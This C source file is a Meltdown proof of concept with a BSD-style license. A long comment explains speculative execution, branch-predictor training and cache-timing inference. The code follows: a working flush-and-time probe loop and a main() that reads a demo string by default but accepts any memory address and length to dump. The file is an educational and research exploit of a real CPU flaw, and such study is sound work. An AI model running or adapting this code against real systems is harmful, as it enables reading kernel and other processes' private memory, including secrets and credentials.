/*-
 * Copyright (c) 2018
 *      Bill Paul <wpaul@windriver.com>.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by Bill Paul.
 * 4. Neither the name of the author nor the names of any co-contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY Bill Paul AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL Bill Paul OR THE VOICES IN HIS HEAD
 * BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
 * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
 * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
 * THE POSSIBILITY OF SUCH DAMAGE.
 */

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#include "melt.h"

/*
 * Sample meltdown proof of concept.
 *
 * This program relies on tricking the CPU in two ways:
 *
 * - Getting it to speculatively load a block of data into the
 *   cache using an index value which we shouldn't be allowed to see
 *
 * - Mis-predicting a load from the disallowed address
 *
 * For performance reasons, the CPU will try to speculatively pre-load
 * memory regions into the cache which it predicts it will need soon.
 * Sometimes those predictions are wrong, however the cache pre-load
 * happens anyway. Aside from potentially creating a little extra
 * cache threashing, these mispredictions don't usually hurt anything.
 *
 * It turns out that with a lot of existing hardware, these
 * speculative pre-loads occur before page access rights checks are
 * performed.
 *
 * If the CPU is running in user mode and there's a page of
 * memory in the current virtual address space whose MMU attribute
 * bits say it's only accessible in supervisor mode, trying to do a
 * read from that page would trigger a fault. In UNIX this would
 * trigger a segmentation violation and core dump. The CPU will not
 * not load the value from the target address into one of its
 * registers because that would be a security violation.
 *
 * The problem is that even though the read instruction doesn't complete,
 * the CPU may still perform speculative cache loads based on the value
 * stored at the inaccessible address, and that operation is not reversed
 * once the CPU realizes that it's encountered an access rights error. If
 * we trick the CPU into pre-loading a particular address based on that
 * value, we can now infer what that value was.
 *
 * What we can do is pre-allocate 256 blocks of memory, preferably with
 * each block starting on a separate cache line. We then ensure that
 * each of these blocks is evicted from the L1 cache. We then cause the
 * CPU to attempt a read of a byte from a prohibited area and use that
 * byte as an index to do a read from one of the 256 uncached blocks.
 * If the byte at the prohibited location is 32, then the CPU will
 * do a speculative cache load of the 32nd block. We can go through
 * each of the 256 blocks and time how long it takes to read from it.
 * If the block is cached, it should take much less time that if it's
 * uncached. We should discover that we can read the 32nd block much
 * faster than all the others. We can now infer that the byte stored
 * at the prohibited location was 32.
 *
 * Exploiting this is a little tricky because of the implied page fault
 * that will occur when the invalid access is attempted. There are ways
 * to catch the exception of course, but it would be nice if we could
 * avoid that. One possible approach that has been descriped is to use
 * the TSX transactional memory feature available in some processors.
 * Unfortunately this fearture isn't that common, and Intel also disabled
 * it in many newer CPUs due to discovered hardware bugs.
 *
 * It turns out that we can also exploit the branch predictor to avoid
 * the exception entirely. The trick is to train the branch prediction
 * logic with a loop like this:
 *
 * - read a flag value from memory
 * - if the flag value is non-zero, then just abort
 * - if the flag value is 0 then do a read from a memory address
 * - use the valud read from that address as an index to read from
 *   a separate array of data blocks
 *
 * Let's say we run this loop for 1000 iterations. On the first 999
 * iterations, we read the index value from a memory location that's
 * accessible to us and use it to index into the array of blocks.
 *
 * But on the 1000th interation, we try to read the index from an
 * inaccessible address. We _also_ set the decision flag to false.
 *
 * By executing the loop successfully 999 times, the branch predictor
 * will be trained to expect that the read of the index value and of
 * the array must occur, and it will perform a speculative preload of
 * the corresponding array block for us.
 *
 * On the 1000th iteration, we change our minds: we set the decision
 * flag to indicate that we don't want to actually do the access after
 * all.
 * 
 * But the CPU will mis-predict that we do want to perform the reads
 * based on the earlier passes through the loop, and it will therefore
 * perform the speculative pre-load again, even though it turns out
 * this wasn't necessary.
 *
 * We therefore avoid the overt access to the prohibited memory area
 * while still taking advantage of speculative pre-loading.
 */

uint8_t * probe_array;
__attribute__((aligned(64)))
volatile unsigned long * pointers[PROBE_SLOTS];
__attribute__((aligned(64)))
volatile unsigned long flags[PROBE_SLOTS];
unsigned long dummy_index = 0xFF;

static char secret[] = "The quick brown fox jumps over the lazy dog";

uint8_t
probe_memory (unsigned long addr)
{
	int results[256];
	int tries;
	uint64_t diff;
	uint8_t val = 0;
	int maxhits;
	int maxindex;
	volatile int i;

	for (i = 0; i < 256; i++)
		results[i] = 0;

	/*
	 * Initialize the pointers[] and flags[] arrays. The first
	 * PROBE_SLOTS - 1 entries cause the probe loop to perform
	 * a normal read from one of the entries in the probe_array[].
	 * The last entry has a flag value that tells the probe
	 * loop _not_ to attempt a read, and the last pointers[]
	 * address is our target. The CPU will not do an overt read
	 * from the probe address, but the loop will have trained
	 * the branch predictor to expect that a read will occur,
	 * so it will attempt a speculative preload of the block
	 * in the probe_array[] that corresponds to the byte value
	 * in the target address.
	 */

	for (i = 0; i < PROBE_SLOTS; i++) {
		pointers[i] = (unsigned long *)&dummy_index;
		flags[i] = 0;
	}

	pointers[PROBE_SLOTS - 1] = (unsigned long *)addr;
	flags[PROBE_SLOTS - 1] = 1;

	/*
	 * Force an update to the probe array locations in case
	 * the memory is only allocated on write.
	 */

	for (i = 0; i < 256; i++)
		probe_array[i * PROBE_PAGE_SIZE] = 0;

	/* Make sure the updates are committed to RAM. */

	mfence ();

	for (tries = 0; tries < PROBE_TRIES; tries++) {


		/*
		 * Make sure that the first cache line in each block
		 * of the probe array is evicted from the cache.
		 */

		for (i = 0; i < 256; i++)
			cflush (&probe_array[i * PROBE_PAGE_SIZE]);

		lfence ();

		/*
		 * Main loop. Each entry in the pointers[] array contains
		 * an address from which we'll load an index, which in
		 * turn will be used to attempt a read from one of the
		 * pages in probe_array[]. The first few times through
		 * the loop, the index will be read from dummy_index.
		 * On the last time through, we'll force a speculative
		 * read from the target address.
		 */

		for (i = 0; i < PROBE_SLOTS; i++) {

			/*
			 * Make sure that this slot in the flags[] array
			 * is uncached. The CPU has to read the flag
			 * value from this location in order to decide
			 * whether or not to actually do the read. Because
			 * the location is uncached, this operation has a
			 * high latency. While it's busy pre-loading the
			 * location into the cache, it will speculatively
			 * execute the next few instructions, which will
			 * cause it to preload one of the probe_array[]
			 * blocks into the cache.
			 */

			cflush (&flags[i]);
			lfence ();

			/* Do the probe attempt. */

			probe (pointers, flags, i, probe_array);
		}

		/*
		 * Check to see which page(s) in the probe_array[]
		 * are now cached.
		 */

		for (i = 0; i < 256; i++) {
			diff = time_read_access (&probe_array[i *
			    PROBE_PAGE_SIZE]);
			if (diff <= PROBE_THRESHOLD)
				results[i]++;
		}
	}

	/* Look for the slot with the most hits */

	maxhits = 0;
	maxindex = 0;

	for (i = 0; i < 256; i++) {
		if (results[i] > maxhits) {
			maxhits = results[i];
			maxindex = i;
		}
	}

 	val = (uint8_t)maxindex;

	return (val);
}

int
main (int argc, char * argv[])
{
	unsigned long addr;
	unsigned long * p;
	uint8_t * probe_addr;
	unsigned long probe_len;
	unsigned long i;
	uint8_t value;

	/*
	 * Allocate the probe array blocks. Make sure they're
	 * aligned on the specified page boundary.
	 */

	p = malloc ((PROBE_PAGE_SIZE * 256) + PROBE_PAGE_SIZE);

	addr = (unsigned long)p;
	addr &= (unsigned long)(~(PROBE_PAGE_SIZE - 1));
	addr += PROBE_PAGE_SIZE;
	probe_array = (uint8_t *)addr;

	/*
	 * By default, try to dump the test string. If the user
	 * provides an explicit address and length, use that
	 * instead.
	 */

	probe_addr = (uint8_t *)(secret);
	probe_len = strlen (secret);

	if (argc == 3) {
		sscanf (argv[1], "%p", (void**)(&probe_addr));
		sscanf (argv[2], "%lu", &probe_len);
	}

	for (i = 0; i < probe_len; i++) {
		addr = (unsigned long)probe_addr;
		addr += i;
		value = probe_memory (addr);
		printf ("%p: %x (%c)\n", (void *)addr,
		    value, isascii (value) ? value : '*');
	}

	exit (0);
}
